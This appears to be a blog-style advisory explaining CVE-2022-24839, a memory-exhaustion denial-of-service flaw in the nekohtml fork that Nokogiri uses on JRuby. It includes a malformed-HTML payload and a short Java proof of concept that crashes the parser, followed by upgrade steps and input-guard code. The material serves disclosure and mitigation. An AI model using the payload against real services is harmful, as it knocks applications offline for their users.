org.cyberneko.html is a widely used HTML parser written in Java. Many Java-based tools and some Ruby projects use variants or forks of this parser for HTML processing. One such project is Nokogiri, a popular Ruby gem for HTML, XML, SAX, and Reader parsing. Nokogiri uses a specific fork of nekohtml maintained at sparklemotion/nekohtml.

In early 2022, a vulnerability was discovered in this fork. It could allow someone to intentionally crash your application just by feeding it malformed HTML. This post explains CVE-2022-24839, includes code samples to demonstrate the problem, shows possible exploit scenarios, and provides references and mitigation steps.  

What is CVE-2022-24839?

CVE-2022-24839 is a vulnerability in the fork of org.cyberneko.html, used by Nokogiri, where parsing certain kinds of malformed HTML can cause a java.lang.OutOfMemoryError. This is essentially a Denial of Service (DoS) vulnerability, because if an attacker can control the HTML input to your application, they can potentially bring it down.

Key Points

- Library affected: sparklemotion/nekohtml (the fork used by Nokogiri)
- Vulnerability: Parsing ill-formed / malformed HTML can lead to unbounded memory usage, resulting in OutOfMemoryError and application crash.
- Solution: Upgrade to version >= 1.9.22.noko2 of this library if you use Nokogiri with JRuby.
- Upstream: The original org.cyberneko.html library is no longer maintained, and other forks may be similarly vulnerable.

Official Advisory:  
- Nokogiri Security Advisory: GHSA-7488-3mv7-4pj6  
- CVE Details: CVE-2022-24839

How is this Exploited?

The parser’s job is to read through HTML input and construct a tree representation of it. Real-world HTML is often messy, so parsers are built to be tolerant. But some ill-formed markup can push the parser's error recovery into allocating memory without bound.

Here is an example of a problematic HTML fragment that could trigger the bug:

<!-- lots of unclosed tags -->
<html>
<body>
<div>
<span>
<table>
<tr>
<td>
<!-- repeat many, many times without closing any tag -->

If a user sends this kind of input (on purpose or by accident), the parser keeps allocating memory, trying to make sense of where the tags close. Eventually, the Java Virtual Machine runs out of memory, causing:

Exception in thread "main" java.lang.OutOfMemoryError: Java heap space

Here's a minimal Java program that triggers the issue using the vulnerable library:

import org.cyberneko.html.parsers.DOMParser;
import org.xml.sax.InputSource;

import java.io.StringReader;

public class NekoHTMLCVE {
    public static void main(String[] args) throws Exception {
        // Large malformed HTML string
        StringBuilder sb = new StringBuilder("<html><body>");
        for (int i = 0; i < 50000; i++) {  // Adjust for your heap size
            sb.append("<div>");
        }
        // No closing tags!
        String badHtml = sb.toString();

        DOMParser parser = new DOMParser();
        parser.parse(new InputSource(new StringReader(badHtml))); // triggers OOM!
    }
}


Compile and run with a vulnerable nekohtml build on your classpath. On versions older than 1.9.22.noko2, this may fail with OutOfMemoryError, depending on the configured heap size.

Who is Affected?

- Nokogiri users on JRuby: If your app uses Nokogiri via its JRuby extensions, and is running on a nokogiri version with nekohtml older than 1.9.22.noko2, you're affected.
- Java libraries or apps using sparklemotion/nekohtml directly (rare): Affected if using an old version.
- Other forks: If you use another fork of nekohtml, you should check if you're vulnerable—these forks may share the same legacy code.
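
To make the version threshold above concrete, here is a minimal sketch of a version comparison against 1.9.22.noko2. The class name NekoVersionCheck and its methods are hypothetical, and the parsing assumes version strings shaped like major.minor.patch with an optional ".noko<N>" suffix. Treating a missing suffix as lower than any noko build is also an assumption, not something the advisory specifies.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class NekoVersionCheck {
    // Assumed shape: "1.9.22" or "1.9.22.noko2" (hypothetical parsing rule)
    private static final Pattern VERSION =
            Pattern.compile("(\\d+)\\.(\\d+)\\.(\\d+)(?:\\.noko(\\d+))?");

    // First fixed release of the sparklemotion fork, per the advisory
    private static final String FIXED = "1.9.22.noko2";

    /** Splits a version string into {major, minor, patch, noko}. */
    static int[] parse(String version) {
        Matcher m = VERSION.matcher(version.trim());
        if (!m.matches()) {
            throw new IllegalArgumentException("Unrecognized version: " + version);
        }
        // Assumption: a build without a ".noko<N>" suffix sorts before any noko build
        int noko = m.group(4) == null ? 0 : Integer.parseInt(m.group(4));
        return new int[] {
            Integer.parseInt(m.group(1)),
            Integer.parseInt(m.group(2)),
            Integer.parseInt(m.group(3)),
            noko
        };
    }

    /** Returns true if the given version is at least 1.9.22.noko2. */
    static boolean isPatched(String version) {
        int[] have = parse(version);
        int[] fixed = parse(FIXED);
        for (int i = 0; i < have.length; i++) {
            if (have[i] != fixed[i]) {
                return have[i] > fixed[i];
            }
        }
        return true; // identical to the fixed version
    }

    public static void main(String[] args) {
        for (String v : new String[] {"1.9.21", "1.9.22.noko1", "1.9.22.noko2"}) {
            System.out.println(v + " patched? " + isPatched(v));
        }
    }
}
```

How you obtain the version string (jar file name, build manifest, dependency report) depends on your setup and is left out of the sketch.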

Mitigation Steps

1. Upgrade Nokogiri to a release that bundles nekohtml 1.9.22.noko2 or later (Nokogiri 1.13.4 was the release that picked up this fix). The maintainers fixed the issue in the commit linked at the end of this post. Update your Gemfile and run:

bundle update nokogiri

2. If you depend on sparklemotion/nekohtml directly, switch to 1.9.22.noko2 or later.

3. Consider replacing org.cyberneko.html with a better-maintained HTML parser (like jsoup), since the original nekohtml is abandoned.
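
If you cannot upgrade right away, one stopgap is to reject suspicious input before it reaches the parser. The sketch below is a coarse heuristic, not a fix and not part of nekohtml or Nokogiri: the class HtmlInputGuard, its method names, and the thresholds are all hypothetical. It caps the input length and the number of opening tags, which is enough to reject the kind of payload shown earlier, but it does not measure real nesting depth.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class HtmlInputGuard {
    // Matches the start of an opening tag such as "<div" or "<td".
    // Closing tags ("</div") and comments ("<!--") do not match.
    private static final Pattern OPEN_TAG = Pattern.compile("<[A-Za-z]");

    /** Counts opening-tag starts, stopping early once the count exceeds limit. */
    static int countOpenTags(String html, int limit) {
        Matcher m = OPEN_TAG.matcher(html);
        int count = 0;
        while (count <= limit && m.find()) {
            count++;
        }
        return count;
    }

    /**
     * Returns true if the input is within both limits.
     * maxChars and maxOpenTags are application-specific guesses (assumption).
     */
    static boolean isAcceptable(String html, int maxChars, int maxOpenTags) {
        if (html == null || html.length() > maxChars) {
            return false;
        }
        return countOpenTags(html, maxOpenTags) <= maxOpenTags;
    }

    public static void main(String[] args) {
        // Same shape as the malformed payload above: many unclosed <div> tags
        StringBuilder sb = new StringBuilder("<html><body>");
        for (int i = 0; i < 50000; i++) {
            sb.append("<div>");
        }
        System.out.println(isAcceptable("<p>hello</p>", 1_000_000, 10_000)); // true
        System.out.println(isAcceptable(sb.toString(), 1_000_000, 10_000));  // false
    }
}
```

Call isAcceptable before handing the string to the parser and return an error to the client when it fails. Legitimate documents with very many tags would also be rejected, so treat the limits as tuning knobs and upgrade as soon as you can.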

Why Does This Matter?

HTML parsing is a common activity, especially in scrapers, email processors, and web applications that process untrusted input. If an attacker can make your HTML parser choke, they can potentially crash your system by just sending a malicious HTML payload.

This is a textbook example of how seemingly harmless components (like a library for parsing HTML) can be leveraged for Denial of Service (DoS) attacks.

References

Nokogiri security advisory:

https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-7488-3mv7-4pj6

CVE record:

https://nvd.nist.gov/vuln/detail/CVE-2022-24839

Commit fixing the vulnerability:

https://github.com/sparklemotion/nekohtml/commit/ca0521f6cc395a44deb569b04f9beafdb3e7de12

Nokogiri RubyGem:

https://nokogiri.org/

Original (unmaintained) nekohtml:

http://nekohtml.sourceforge.net/

Summary

CVE-2022-24839 is a real-world example of how parsing untrusted input can turn into a threat, even with popular, "safe" components. If you use Nokogiri on JRuby, or the sparklemotion fork of nekohtml, upgrade immediately to stay safe, and always beware of legacy code dependencies.

Timeline

Published on: 04/11/2022 22:15:00 UTC
Last modified on: 07/25/2022 18:22:00 UTC